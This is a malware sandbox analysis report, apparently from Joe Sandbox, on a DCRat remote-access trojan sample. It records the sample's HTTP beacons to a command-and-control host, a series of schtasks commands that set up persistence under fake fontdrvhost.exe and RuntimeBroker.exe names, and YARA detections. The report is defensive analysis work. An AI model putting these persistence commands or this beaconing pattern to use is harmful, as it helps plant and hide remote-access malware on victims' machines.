                              Aug 31, 2024 10:15:43.077822924 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:43.792327881 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvnevmwbzyMQWAOXp28osqg%2FKjSL0mGwC0mJWHjaV9FSwgOzv8aqJSdGFE5ee7uiFUFSi%2BiGZOnhaylSWgeBkFQ0BWFNPq1LzJiNRq6qhQz%2BrZoHPIaDtvbczuMDp4AFE%2FU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9308beec43c1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0
                              Aug 31, 2024 10:15:44.008378983 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvnevmwbzyMQWAOXp28osqg%2FKjSL0mGwC0mJWHjaV9FSwgOzv8aqJSdGFE5ee7uiFUFSi%2BiGZOnhaylSWgeBkFQ0BWFNPq1LzJiNRq6qhQz%2BrZoHPIaDtvbczuMDp4AFE%2FU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9308beec43c1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.449780188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:48.830816031 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:49.567601919 CEST725INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngbdD9gE63qar8piwCpcw1HTVoCXfS1ZehXfDblo2ffmvRruUJNuJ9Mh8Vp0DA6hVCu9eMgitcZ%2FpGB85UJFYOmSuDtPLvcNMR0swuPUwugDY922EaHuzgh%2BtPuTH3pGggA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb932cc83f43f1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.449781188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:15:54.747430086 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:55.499761105 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ts%2F9PvNmRzU6acDUv2g%2Bay3MpzPoLcVXuAQUQG%2FvTvrp5hoxe4SSl7ZRuTrWk4BMKpxO3Vay29CNLZDV95Vbaxu%2BjFR8yMrtpAMHGB4ExjykFgkjMd2ug4IY%2FxYiIdeVOns%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9351bf1e0f3b-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:04:11:52
                              Start date:31/08/2024
                              Path:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\dmhu7oz5yP.exe"
                              Imagebase:0x2b0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1672344237.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1640757413.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1672344237.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:10
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:13
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:14
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:15
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:16
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                              Imagebase:0x820000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1763313948.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, ReversingLabs
                              Has exited:true

                              General

                              Target ID:17
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                              Imagebase:0xe00000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1764240872.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1764240872.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              General

                              Target ID:18
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Imagebase:0x780000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
